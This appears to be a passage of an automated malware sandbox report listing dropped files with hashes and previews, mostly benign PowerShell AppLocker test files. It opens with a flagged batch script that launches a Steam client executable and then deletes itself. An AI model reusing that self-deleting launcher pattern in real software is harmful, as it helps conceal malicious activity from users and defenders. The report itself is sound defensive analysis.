                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\Steam\steamclient.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\XyagYCCOZX.bat"

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0xaq1mla.wr2.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1utmv0mk.our.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23h3weqb.iup.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2bb1a3zh.m5m.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ezy1e2m.yxf.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2u3lcngq.2im.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_35qxwjfi.tuf.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3td4kktq.u0b.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0tixeyp.5jk.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arxb4pwb.eqy.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b1esbh2i.yzh.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bcunrahu.d0i.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bgd4zguh.3ce.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bt4npn0r.gxw.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btwhhbdr.dvy.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bwjfm1bf.liw.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_codm3pr5.x0e.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ejo2sobw.ixt.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enlojwpn.bvc.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evv3hrkq.l3j.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1to0rtc.ogw.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4czampg.ftd.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbbnlm4s.ic2.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_go55jtae.3he.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ha254hqb.iij.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqjcet4n.tcg.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iwdnnk32.gy0.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2pblsrt.3zy.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzrw0dnp.sth.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3rowymv.cht.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
